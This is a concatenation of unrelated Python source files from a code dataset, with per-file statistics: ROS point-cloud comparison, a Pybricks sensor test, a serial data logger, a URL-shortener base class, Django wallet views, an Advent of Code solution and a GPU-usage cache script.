self.merge_object_pointcloud, recon_merge_object_pointcloud])
exit()
dist_to_scene = \
recon_merge_object_pointcloud.compute_point_cloud_distance(
self.merge_object_pointcloud)
dist_to_scene = np.asarray(dist_to_scene)
avg_dist2_error = 0
for dist in dist_to_scene:
avg_dist2_error += dist * dist
avg_dist2_error /= dist_to_scene.shape[0]
dist_to_recon = \
self.merge_object_pointcloud.compute_point_cloud_distance(
recon_merge_object_pointcloud)
dist_to_recon = np.asarray(dist_to_recon)
recon_point_num = len(np.where(dist_to_recon < 0.2)[0])
recon_percent = 1.0 * recon_point_num / self.scene_point_num
if not self.logScalar("PointCloudDiff/object_error",
self.last_log_time - self.log_start_time,
avg_dist2_error):
print("[ERROR][PointCloudDiff::startComparePointCloud]")
print("\t logScalar for point_distance_mean failed!")
return False
if not self.logScalar("PointCloudDiff/object_completeness",
self.last_log_time - self.log_start_time,
recon_percent):
print("[ERROR][PointCloudDiff::startComparePointCloud]")
print("\t logScalar for recon_percent failed!")
return False
dist_to_scene = \
recon_merge_object_pointcloud.compute_point_cloud_distance(
self.merge_valid_object_pointcloud)
dist_to_scene = np.asarray(dist_to_scene)
avg_dist2_error = 0
for dist in dist_to_scene:
avg_dist2_error += dist * dist
avg_dist2_error /= dist_to_scene.shape[0]
dist_to_recon = \
self.merge_valid_object_pointcloud.compute_point_cloud_distance(
recon_merge_object_pointcloud)
dist_to_recon = np.asarray(dist_to_recon)
recon_point_num = len(np.where(dist_to_recon < 0.2)[0])
recon_percent = 1.0 * recon_point_num / self.scene_point_num
if not self.logScalar("PointCloudDiff/valid_object_error",
self.last_log_time - self.log_start_time,
avg_dist2_error):
print("[ERROR][PointCloudDiff::startComparePointCloud]")
print("\t logScalar for point_distance_mean failed!")
return False
if not self.logScalar("PointCloudDiff/valid_object_completeness",
self.last_log_time - self.log_start_time,
recon_percent):
print("[ERROR][PointCloudDiff::startComparePointCloud]")
print("\t logScalar for recon_percent failed!")
return False
return True
def startComparePointCloud(self):
self.log_start_time = time()
self.last_log_time = self.log_start_time
while True:
if not DEBUG:
sleep(10)
new_log_time = time()
if new_log_time == self.last_log_time:
return True
self.last_log_time = new_log_time
if not DEBUG:
if not self.logSceneData():
print("[ERROR][PointCloudDiff::startComparePointCloud]")
print("\t logSceneData failed!")
break
if not self.logObjectData():
print("[ERROR][PointCloudDiff::startComparePointCloud]")
print("\t logObjectData failed!")
break
return True
if __name__ == "__main__":
rospy.init_node("PointCloudDiff")
scene_pointcloud_folder_path = \
os.path.expanduser('~') + "/" + \
rospy.get_param("/scene_pointcloud_folder_path")
pointcloud_diff = PointCloudDiff()
pointcloud_diff.loadAllPointCloud(scene_pointcloud_folder_path)
pointcloud_diff.startComparePointCloud()
| 40.902273 | 97 | 0.64483 | 1,997 | 17,997 | 5.425138 | 0.100651 | 0.100425 | 0.048459 | 0.043843 | 0.646114 | 0.552612 | 0.464925 | 0.439265 | 0.40096 | 0.391822 | 0 | 0.012526 | 0.276935 | 17,997 | 439 | 98 | 40.995444 | 0.820026 | 0.003667 | 0 | 0.425824 | 0 | 0 | 0.098516 | 0.064376 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032967 | false | 0 | 0.024725 | 0 | 0.145604 | 0.087912 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b5bca6fb329af46502ecd4b3cff5294fef66f40 | 1,314 | py | Python | tests/pup/sensors/color_color.py | cschlack/pybricks-micropython | 0abfd2918267a4e6e7a04062976ac1bb3da1f4b1 | [
"MIT"
] | 115 | 2020-06-15T16:43:14.000Z | 2022-03-21T21:11:57.000Z | tests/pup/sensors/color_color.py | cschlack/pybricks-micropython | 0abfd2918267a4e6e7a04062976ac1bb3da1f4b1 | [
"MIT"
] | 83 | 2020-06-17T17:19:29.000Z | 2022-03-08T18:50:35.000Z | tests/pup/sensors/color_color.py | BertLindeman/pybricks-micropython | 8f22a99551100e66ddf08d014d9f442f22b33b4d | [
"MIT"
] | 40 | 2020-06-15T18:36:39.000Z | 2022-03-28T13:22:43.000Z | # SPDX-License-Identifier: MIT
# Copyright (c) 2020 The Pybricks Authors
"""
Hardware Module: 1
Description: Verifies color sensing and calibration capability.
"""
from pybricks.pupdevices import Motor, ColorSensor, UltrasonicSensor
from pybricks.parameters import Port, Color
# Initialize devices.
motor = Motor(Port.A)
color_sensor = ColorSensor(Port.B)
ultrasonic_sensor = UltrasonicSensor(Port.C)
SPEED = 500
# Color angle targets
angles = {
"GREEN": 20,
"BLUE": 110,
"RED": 200,
"YELLOW": 290,
"BLACK": 250,
"WHITE": 75,
"NONE": 162,
}
# Verify saturated colors without calibration.
for name in ("GREEN", "BLUE", "RED", "YELLOW"):
motor.run_target(SPEED, angles[name])
detected = color_sensor.color()
assert detected == Color[name], "Expected {0} but got {1}".format(Color[name], detected)
# Update all colors.
for name in angles.keys():
motor.run_target(SPEED, angles[name])
Color[name] = color_sensor.hsv()
# Set new colors as detectable colors.
color_sensor.detectable_colors([Color[key] for key in angles.keys()])
# Test all newly calibrated colors.
for name in angles.keys():
motor.run_target(SPEED, angles[name])
detected = color_sensor.color()
assert detected == Color[name], "Expected {0} but got {1}".format(Color[name], detected)
| 26.816327 | 92 | 0.702435 | 173 | 1,314 | 5.277457 | 0.468208 | 0.060241 | 0.029573 | 0.062432 | 0.338445 | 0.338445 | 0.338445 | 0.338445 | 0.338445 | 0.338445 | 0 | 0.028259 | 0.165145 | 1,314 | 48 | 93 | 27.375 | 0.804011 | 0.249619 | 0 | 0.333333 | 0 | 0 | 0.100927 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 1 | 0 | false | 0 | 0.074074 | 0 | 0.074074 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b5c888bbb8125ae3ac660dfc5ba639abf84f105 | 3,406 | py | Python | software/firmware/data_dump.py | lab11/polypoint | 0a21b19db7d00c0b0d9b523a54a6b243a5e64bac | [
"Apache-2.0"
] | 132 | 2015-05-16T10:19:15.000Z | 2022-03-17T22:11:49.000Z | software/module/firmware/data_dump.py | pinsonc/totternary | b938123bec8264927984740f7b435ab0b9ebdbd8 | [
"Apache-2.0"
] | 14 | 2015-05-27T07:55:43.000Z | 2018-06-27T22:57:47.000Z | software/module/firmware/data_dump.py | pinsonc/totternary | b938123bec8264927984740f7b435ab0b9ebdbd8 | [
"Apache-2.0"
] | 56 | 2015-06-27T09:51:13.000Z | 2022-01-22T17:02:42.000Z | #!/usr/bin/env python3
import argparse
import binascii
import os
import struct
import sys
import serial
import numpy as np
import scipy.io as sio
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--serial', default='/dev/tty.usbserial-AL00EZAS')
parser.add_argument('-b', '--baudrate', default=3000000, type=int)
parser.add_argument('-o', '--outfile', default='out')
parser.add_argument('-t', '--textfiles',action='store_true',
help="Generate ASCII text files with the data")
parser.add_argument('-m', '--matfile', action='store_true',
help="Generate Matlab-compatible .mat file of the data")
parser.add_argument('-n', '--binfile', action='store_true',
help="Generate binary file of the data")
args = parser.parse_args()
if not (args.textfiles or args.matfile or args.binfile):
print("Error: Must specify at least one of -t, -m, or -n")
print("")
parser.print_help()
sys.exit(1)
dev = serial.Serial(args.serial, args.baudrate)
if dev.isOpen():
print("Connected to device at " + dev.portstr)
else:
raise NotImplementedError("Failed to connect to serial device " + args.serial)
def useful_read(length):
b = dev.read(length)
while len(b) < length:
b += dev.read(length - len(b))
assert len(b) == length
return b
HEADER = (0x80018001).to_bytes(4, 'big')
DATA_HEADER = (0x8080).to_bytes(2, 'big')
FOOTER = (0x80FE).to_bytes(2, 'big')
def find_header():
b = useful_read(len(HEADER))
while b != HEADER:
b = b[1:len(HEADER)] + useful_read(1)
if args.textfiles:
tsfile = open(args.outfile + '.timestamps', 'w')
datfile = open(args.outfile + '.data', 'w')
if args.matfile:
allts = []
alldata = []
if args.binfile:
binfile = open(args.outfile + '.bin', 'wb')
good = 0
bad = 0
NUM_RANGING_CHANNELS = 3
data_section_length = 8*NUM_RANGING_CHANNELS + 8+1+1+8+8+30*8
try:
while True:
sys.stdout.write("\rGood {} Bad {}\t\t".format(good, bad))
try:
find_header()
num_anchors, = struct.unpack("<B", useful_read(1))
tline = '['
inner = []
bline = struct.pack("<B", num_anchors)
for x in range(num_anchors):
b = useful_read(len(DATA_HEADER))
if b != DATA_HEADER:
raise AssertionError
data = useful_read(data_section_length)
bline += data
tline += ']'
#bline += useful_read(4) # round_num
#bline += useful_read(2) # fp_idx
#bline += useful_read(2) # fp_idx
#bline += useful_read(4) # finfo
footer = useful_read(len(FOOTER))
if footer != FOOTER:
raise AssertionError
good += 1
if args.textfiles:
tsfile.write(str(timestamp) + '\n')
datfile.write(tline + '\n')
if args.matfile:
allts.append(timestamp)
alldata.append(inner)
if args.binfile:
binfile.write(bline)
except AssertionError:
bad += 1
except KeyboardInterrupt:
pass
print("\nGood {}\nBad {}".format(good, bad))
if args.textfiles:
print("Wrote ASCII outputs to " + args.outfile + ".{timestamps,data}")
if args.matfile:
sio.savemat(args.outfile+'.mat', {
'timestamps': allts,
'data': alldata,
})
print('Wrote Matlab-friendly file to ' + args.outfile + '.mat')
if args.binfile:
print('Wrote binary output to ' + args.outfile + '.bin')
print('\tBinary data is formatted as:')
print('\t<uint64_t><int16_t><int16_t><int16_t><int16_t>... all little endian')
print('\ttimestmap real0 imag0 real1 imag1 ...')
print('\tFor 1024 total complex numbers')
| 24.328571 | 79 | 0.66882 | 487 | 3,406 | 4.577002 | 0.347023 | 0.049349 | 0.04576 | 0.025572 | 0.132346 | 0.036788 | 0.036788 | 0.025572 | 0.025572 | 0 | 0 | 0.024779 | 0.170581 | 3,406 | 139 | 80 | 24.503597 | 0.764248 | 0.043159 | 0 | 0.128713 | 0 | 0 | 0.227762 | 0.024007 | 0 | 0 | 0.006771 | 0 | 0.039604 | 1 | 0.019802 | false | 0.009901 | 0.079208 | 0 | 0.108911 | 0.118812 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b5f3d38d66083adf3fa27d5150cb13f0c26d96e | 4,642 | py | Python | venv/Lib/site-packages/pyshorteners/base.py | arturj9/encurtar-link | 2e5bfdd2b2525f10f41942c79cb45cc4e43a24ee | [
"MIT"
] | null | null | null | venv/Lib/site-packages/pyshorteners/base.py | arturj9/encurtar-link | 2e5bfdd2b2525f10f41942c79cb45cc4e43a24ee | [
"MIT"
] | null | null | null | venv/Lib/site-packages/pyshorteners/base.py | arturj9/encurtar-link | 2e5bfdd2b2525f10f41942c79cb45cc4e43a24ee | [
"MIT"
] | null | null | null | import requests
import re
from .exceptions import BadURLException, ExpandingErrorException
URL_RE = re.compile(
r"(?i)\b((?:https?://|www\d{0,3}[.]|[a-z0-9.\-]+[.]"
r"[a-z]{2,4}/)(?:[^\s()<>]+|\(([^\s()<>]+|(\([^\s()<>]+\)"
r"))*\))+(?:\(([^\s()<>]+|(\([^\s()<>]+\)))*\)|[^\s`!()"
r'\[\]{};:\'".,<>?«»“”‘’]))'
)
class BaseShortener:
"""Base Class for all shorteners.
Keyword Args:
proxies (dict, optional): Web proxy configuration for :ref:`Requests
Proxies <requests:proxies>`.
timeout (int, optional): Seconds before request is killed.
verify (bool, str, optional): SSL Certificate verification for
:ref:`Requests Verification <requests:verification>`.
Example:
>>> class NewShortener(BaseShortener):
... api_url = 'http://the/link/for/the/api'
... def short(self, url):
... pass
... def expand(self, url):
... pass
... def custom_method(self):
... pass
"""
def __init__(self, **kwargs):
for key, item in list(kwargs.items()):
setattr(self, key, item)
# safe check
self.timeout = getattr(self, "timeout", 2)
self.verify = getattr(self, "verify", True)
self.proxies = getattr(self, "proxies", {})
def _get(self, url, params=None, headers=None):
"""Wrap a GET request with a url check.
Args:
url (str): URL shortener address.
Keyword Args:
headers (dict): HTTP headers to add, `Requests Custom Headers`_.
params (dict): URL parameters, `Requests Parameters`_.
.. _Requests Custom Headers: http://requests.kennethreitz.org/en/master/user/quickstart/#custom-headers
.. _Requests Parameters: http://requests.kennethreitz.org/en/master/user/quickstart/#passing-parameters-in-urls
Returns:
requests.Response: HTTP response.
"""
url = self.clean_url(url)
response = requests.get(
url,
params=params,
verify=self.verify,
timeout=self.timeout,
headers=headers,
proxies=self.proxies,
)
return response
def _post(self, url, data=None, json=None, params=None, headers=None):
"""Wrap a POST request with a url check.
Args:
url (str): URL shortener address.
Keyword Args:
data (dict, str): Form-encoded data, `Requests POST Data`_.
headers (dict): HTTP headers to add, `Requests Custom Headers`_.
json (dict): Python object to JSON encode for data, `Requests
POST Data`_.
params (dict): URL parameters, `Requests Parameters`_.
.. _Requests Custom Headers: http://requests.kennethreitz.org/en/master/user/quickstart/#custom-headers
.. _Requests Parameters: http://requests.kennethreitz.org/en/master/user/quickstart/#passing-parameters-in-urls
.. _Requests POST Data: http://requests.kennethreitz.org/en/master/user/quickstart/#more-complicated-post-requests
Returns:
requests.Response: HTTP response.
"""
url = self.clean_url(url)
response = requests.post(
url,
data=data,
json=json,
params=params,
headers=headers,
timeout=self.timeout,
verify=self.verify,
proxies=self.proxies,
)
return response
def short(self, url):
"""Shorten URL using a shortening service.
Args:
url (str): URL to shorten.
Raises:
NotImplementedError: Subclass must override.
"""
raise NotImplementedError
def expand(self, url):
"""Expand URL using a shortening service.
Only visits the link, and returns the response url.
Args:
url (str): URL to shorten.
Raises:
ExpandingErrorException: URL failed to expand.
"""
url = self.clean_url(url)
response = self._get(url)
if response.ok:
return response.url
raise ExpandingErrorException
@staticmethod
def clean_url(url):
"""URL validation.
Args:
url (str): URL to shorten.
Raises:
BadURLException: URL is not valid.
"""
if not url.startswith(("http://", "https://")):
url = f"http://{url}"
if not URL_RE.match(url):
raise BadURLException(f"{url} is not valid")
return url
| 29.948387 | 122 | 0.554718 | 490 | 4,642 | 5.206122 | 0.273469 | 0.016464 | 0.0196 | 0.02548 | 0.437084 | 0.416699 | 0.358683 | 0.325755 | 0.306546 | 0.268914 | 0 | 0.002182 | 0.308919 | 4,642 | 154 | 123 | 30.142857 | 0.792394 | 0.497199 | 0 | 0.309091 | 0 | 0.036364 | 0.121133 | 0.082328 | 0 | 0 | 0 | 0 | 0 | 1 | 0.109091 | false | 0 | 0.054545 | 0 | 0.254545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b5fb3612eed2c2c094b3078cd58aaf1ac0191cc | 3,937 | py | Python | walletUI/wallet/views.py | avinashshenoy97/brownie-points | 27eb1e9a5ab685e72a5b701c0f76af44d9700960 | [
"MIT"
] | 1 | 2020-11-25T12:14:40.000Z | 2020-11-25T12:14:40.000Z | walletUI/wallet/views.py | avinashshenoy97/brownie-points | 27eb1e9a5ab685e72a5b701c0f76af44d9700960 | [
"MIT"
] | null | null | null | walletUI/wallet/views.py | avinashshenoy97/brownie-points | 27eb1e9a5ab685e72a5b701c0f76af44d9700960 | [
"MIT"
] | null | null | null | from django.shortcuts import render
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response
import requests
import os,sys,inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
main_dir = os.path.dirname(parentdir)
sys.path.insert(0,main_dir)
print(sys.path)
context={}
myAddress=''
def wallet(request):
return render(request, "index.html",context)
class sendCoinsView(APIView):
def put(self,request):
print("put",request.data)
r=requests.post('http://127.0.0.1:16000/control/sendTransaction',json=request.data)
data={"transactionNumber":1,"statusCode":r.status_code}
return Response(data)
class transactionStatusView(APIView):
def get(self,request):
global myAddress
pendingTx = requests.get('http://127.0.0.1:16000/control/getTransactionPool',params=request.data)
print("pending",pendingTx.json())
if(len(pendingTx.json())==0):
transactionAddr=[]
transactionCoins=[]
transactionAddrSender=[]
else:
transactionAddr = [x['txOuts'][0]['address'] for x in pendingTx.json() if x['txOuts'][1]['address']==myAddress]
transactionCoins = [x['txOuts'][0]['amount'] for x in pendingTx.json() if x['txOuts'][1]['address']==myAddress]
transactionAddrSender = [x['txOuts'][1]['address'] for x in pendingTx.json() if x['txOuts'][1]['address']==myAddress]
completedTx = requests.get('http://127.0.0.1:16000/control/getAllBlocks',params=request.data)
print("complete",completedTx.json())
completedTxAddr=[]
completedTxAmt=[]
completedTxSenderAddr=[]
for blocks in completedTx.json():
for txs in blocks['data']:
if(len(txs['txOuts'])==1):
if txs['txOuts'][0]['address']==myAddress:
completedTxAddr.append(txs['txOuts'][0]['address'])
completedTxAmt.append(txs['txOuts'][0]['amount'])
completedTxSenderAddr.append(txs['txOuts'][0]['address'])
else:
if txs['txOuts'][1]['address']==myAddress:
completedTxAddr.append(txs['txOuts'][0]['address'])
completedTxAmt.append(txs['txOuts'][0]['amount'])
completedTxSenderAddr.append(txs['txOuts'][1]['address'])
data={"transactionAddr":transactionAddr,"transactionCoins":transactionCoins,"transactionAddrSender":transactionAddrSender,"completedTxAddr":completedTxAddr,"completedTxAmt":completedTxAmt,"completedTxSenderAddr":completedTxSenderAddr}
print(data)
return Response(data)
class publicAddressView(APIView):
def get(self,request):
global myAddress
publicAddr = requests.get('http://127.0.0.1:16000/control/getWalletAddress',params=request.data)
myAddress=publicAddr.json()['address']
data={"publicKey":publicAddr.json()['address']}
print(data)
return Response(data)
class balanceView(APIView):
def get(self,request):
global myAddress
balance = requests.get('http://127.0.0.1:16000/control/getUnspentTxOuts',params=request.data)
print(balance,balance.json())
b = sum([t['amount'] for t in balance.json() if t['address']==myAddress])
data={"balance":b}
return Response(data)
class mineView(APIView):
def put(self,request):
requests.put('http://127.0.0.1:16000/control/mineBlock',params=request.data)
class logsView(APIView):
def get(self,request):
completedTx = requests.get('http://127.0.0.1:16000/control/getAllBlocks',params=request.data)
logs=[]
for blocks in completedTx.json():
for txs in blocks['data']:
if(len(txs['txOuts'])==1):
if(txs['txOuts'][0]['address']==myAddress):
logs.append(["received",txs['txOuts'][0]['amount'],txs['txOuts'][0]['address']])
elif txs['txOuts'][0]['address']==myAddress:
logs.append(["received",txs['txOuts'][0]['amount'],txs['txOuts'][1]['address']])
elif txs['txOuts'][1]['address']==myAddress:
logs.append(["sent",txs['txOuts'][0]['amount'],txs['txOuts'][0]['address']])
data={"logs":logs}
print(data)
return Response(data) | 40.173469 | 236 | 0.712217 | 491 | 3,937 | 5.698574 | 0.197556 | 0.061115 | 0.046462 | 0.048606 | 0.473553 | 0.422445 | 0.399571 | 0.34203 | 0.327377 | 0.291994 | 0 | 0.029611 | 0.099314 | 3,937 | 98 | 237 | 40.173469 | 0.759447 | 0 | 0 | 0.348315 | 0 | 0 | 0.216353 | 0.010665 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078652 | false | 0 | 0.067416 | 0.011236 | 0.280899 | 0.089888 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b62f118e2ffc9dd673f3068d8b01e2b12d22cc7 | 1,362 | py | Python | tests/test_template.py | furbrain/CVExplorer | 1283e3320ef7bb610b1044543614dd1b96740e52 | [
"MIT"
] | null | null | null | tests/test_template.py | furbrain/CVExplorer | 1283e3320ef7bb610b1044543614dd1b96740e52 | [
"MIT"
] | null | null | null | tests/test_template.py | furbrain/CVExplorer | 1283e3320ef7bb610b1044543614dd1b96740e52 | [
"MIT"
] | null | null | null | from unittest import TestCase
import os.path
import cv2
from lxml import html
from functions import ParameterTemplate
from functions.template import FunctionTemplate
FIXTURES_FILTER_HTML = "/usr/share/doc/opencv-doc/opencv4/html/d4/d86/group__imgproc__filter.html"
FIXTURES_FRAGMENT_HTML = os.path.join(os.path.dirname(__file__), "fixtures/filter_fragment.html")
class TestFunctionTemplate(TestCase):
@classmethod
def setUpClass(cls) -> None:
from functions.paramtype import ParamType
ParamType.initialise()
with open(FIXTURES_FILTER_HTML) as f:
cls.filter_text = f.read()
with open(FIXTURES_FRAGMENT_HTML) as f:
cls.filter_fragment = f.read()
def setUp(self) -> None:
self.html_frag = html.fromstring(self.filter_fragment)
def test_create_function(self):
self.func_template = FunctionTemplate(
name="pyrDown",
module="cv2",
inputs=[
ParameterTemplate("src", "InputArray")
],
outputs=[
ParameterTemplate("dst", "OutputArray")
],
docs="FunctionTemplate docs"
)
function = self.func_template.create_function()
self.assertEqual(cv2.pyrDown, function.func)
self.assertListEqual(["dst"], [r.name for r in function.results])
| 32.428571 | 98 | 0.65859 | 149 | 1,362 | 5.845638 | 0.449664 | 0.020666 | 0.041332 | 0.022962 | 0.036739 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006796 | 0.243759 | 1,362 | 41 | 99 | 33.219512 | 0.838835 | 0 | 0 | 0.058824 | 0 | 0.029412 | 0.119765 | 0.074945 | 0 | 0 | 0 | 0 | 0.058824 | 1 | 0.088235 | false | 0 | 0.205882 | 0 | 0.323529 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b6372f2718a1820477d44a40467e6e54ef84811 | 3,662 | py | Python | Eric/day3.py | efacks68/codingjuntos_advent2020 | 1d7ef6278616716ad62a5f3af3fa0419173b6dc1 | [
"MIT"
] | 1 | 2020-12-02T20:16:16.000Z | 2020-12-02T20:16:16.000Z | Eric/day3.py | efacks68/codingjuntos_advent2020 | 1d7ef6278616716ad62a5f3af3fa0419173b6dc1 | [
"MIT"
] | null | null | null | Eric/day3.py | efacks68/codingjuntos_advent2020 | 1d7ef6278616716ad62a5f3af3fa0419173b6dc1 | [
"MIT"
] | null | null | null | #Day3: Toboggan Trajectory
#Part1: Starting in Top-Left Corner, follow a slope of Right 3 and Down 1.
f=open("input_day3.txt")
lines=f.readlines() #read in each line
f.close()
#print("lines\n",lines)
length=0
mnt=[]
for row in lines:
mnt.append(str(row)) #move into new list for easier manipulation
length=length+1
width=len(row)
#print("mnt\n",mnt)
print("L:",length,"W:",width)
trees0=0 #sum of trees hit
i=0 #counter for 'x' direction
j=0 #counter for 'y' direction
#print("length=",length)
#bc apprently you have to 'rotate' your input 90 degrees to the left (?)
#to make it look like the example(which wasn't clear!), add the j to count the rows down
#so that it can move correctly
count=0
for row in mnt:
# print("row:",j,"position:",i)
# print(row[i])
if(row[i]=="#"):
trees0=trees0+1
# print("trees1:",trees1)
i=i+3
j=j-1
count=count+1
if(i>=width):
# print("i:",i)
rem=i%width
# print("rem:",rem)
i=rem
# print(i)
# if(count==50):break
print("Part1: num trees:",trees0)
#not 5 or 9 or 102 or 100
#Part2 - find the number of trees for each of the following slopes, then multiply them together
#R1,D1
#R3,D1 (already done)
#R5,D1
#R7,D1
#R1,D2
def slope(slp,R,D,W):
i=0
j=0
trees=0
for row in slp:
# print("row:",j,"position:",i)
# print(row[i])
if(D==1):
if(row[i]=="#"):
trees=trees+1
# print("trees:",trees)
i=i+R
else:
if((j%D)==0) :
if (row[i]=="#"):
trees=trees+1
# print("trees:",trees)
i=i+R
j=j+1
if(i>=(W-1)):
# print("i:",i)
rem=i%(W-1)
# print("rem:",rem)
i=rem
# print(i)
# if(count==10):break
print("Trees:",trees)
return trees
trees1=slope(mnt,1,1,width)
trees2=slope(mnt,3,1,width)
trees3=slope(mnt,5,1,width)
trees4=slope(mnt,7,1,width)
trees5=slope(mnt,1,2,width)
def bulkcomment():
"""
print("Trees:",trees)
#slope2
i=0
j=0
count=0
trees2=0
for row in mnt:
# print("row:",j,"position:",i)
# print(row[i])
if(row[i]=="#"):
trees2=trees2+1
# print("trees2:",trees2)
i=i+5
j=j-1
# count=count+1
if(i>=31):
# print("i:",i)
rem=i%31
# print("rem:",rem)
i=rem
# print(i)
# if(count==10):break
print("Trees2:",trees2)
#slope3
i=0
j=0
count=0
trees3=0
for row in mnt:
# print("row:",j,"position:",i)
# print(row[i])
if(row[i]=="#"):
trees3=trees3+1
# print("trees3:",trees3)
i=i+7
j=j-1
# count=count+1
if(i>=31):
# print("i:",i)
rem=i%31
# print("rem:",rem)
i=rem
# print(i)
# if(count==10):break
print("Trees3:",trees3)
#slope4
i=0
j=0
count=0
trees4=0
for row in mnt:
print("row:",j,"position:",i)
print(row[i])
if((j%2)==0 and row[i]=="#"):
trees4=trees4+1
print("trees4:",trees4)
i=i+1
j=j-1
# count=count+1
if(i>=31):
print("i:",i)
rem=i%31
print("rem:",rem)
i=rem
print(i)
# if(count==10):break
print("Trees4:",trees4)
"""
print("Product:",trees1*trees2*trees3*trees4*trees5)
#Not:
#Trees1: 104
#Trees: 230
#Trees2: 83
#Trees3: 98
#Trees4: 104
#Product: 20234789120
#Not:
#Trees1: 104
#Trees: 230
#Trees2: 83
#Trees3: 98
#Trees4: 50
#Product: 9728264000
#later attempt: make a function out of it by sending the i and j changes
#function done!
| 19.902174 | 95 | 0.534134 | 582 | 3,662 | 3.359107 | 0.249141 | 0.022506 | 0.024552 | 0.023018 | 0.364194 | 0.352941 | 0.337596 | 0.337596 | 0.3289 | 0.299744 | 0 | 0.076012 | 0.28509 | 3,662 | 183 | 96 | 20.010929 | 0.670741 | 0.66876 | 0 | 0.254902 | 0 | 0 | 0.045022 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039216 | false | 0 | 0 | 0 | 0.058824 | 0.078431 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b65b745e1b964b05f2af0b1c1dc9c88bdbc1879 | 235 | py | Python | equipment_slots.py | BTmathic/game-template | 77765b1340e51828cc9216b4239f558c251859ce | [
"MIT"
] | 1 | 2019-09-01T20:15:52.000Z | 2019-09-01T20:15:52.000Z | equipment_slots.py | BTmathic/game-template | 77765b1340e51828cc9216b4239f558c251859ce | [
"MIT"
] | null | null | null | equipment_slots.py | BTmathic/game-template | 77765b1340e51828cc9216b4239f558c251859ce | [
"MIT"
] | null | null | null | from enum import auto, Enum
class EquipmentSlots(Enum):
MAIN_HAND = auto()
OFF_HAND = auto()
HEAD = auto()
BODY = auto()
LEGS = auto()
BOOTS = auto()
L_RING = auto()
R_RING = auto()
CLOAK = auto()
| 16.785714 | 27 | 0.561702 | 30 | 235 | 4.266667 | 0.566667 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.306383 | 235 | 13 | 28 | 18.076923 | 0.785276 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b6848b8710fcce4dc8ab6725a2afbe088dcdcab | 1,200 | py | Python | make_cache.py | jdh4/tigergpu_visualization | 770697124e6c8e04432db08002107dbd694e233b | [
"CNRI-Python"
] | null | null | null | make_cache.py | jdh4/tigergpu_visualization | 770697124e6c8e04432db08002107dbd694e233b | [
"CNRI-Python"
] | null | null | null | make_cache.py | jdh4/tigergpu_visualization | 770697124e6c8e04432db08002107dbd694e233b | [
"CNRI-Python"
] | 1 | 2020-05-26T15:13:15.000Z | 2020-05-26T15:13:15.000Z | #!/usr/licensed/anaconda3/2020.11/bin/python
base = "/home/jdh4/bin/gpus"
import sys
sys.path = list(filter(lambda p: p.startswith("/usr"), sys.path))
sys.path.append(base)
import json
import subprocess
import pandas as pd
from dossier import ldap_plus
if 1:
rows = []
with open(base + "/utilization.json") as fp:
for line in fp.readlines():
x = json.loads(line)
rows.append(list(x.values()))
df = pd.DataFrame(rows)
del rows
df.columns = ['timestamp', 'host', 'index', 'username', 'usage', 'jobid']
netids = list(df.username.drop_duplicates().values)
if "root" in netids: netids.remove("root")
if "OFFLINE" in netids: netids.remove("OFFLINE")
else:
cmd = "getent passwd | cut -d: -f1 | sort | uniq"
output = subprocess.run(cmd, capture_output=True, shell=True)
netids = output.stdout.decode("utf-8").split('\n')
netids.remove('')
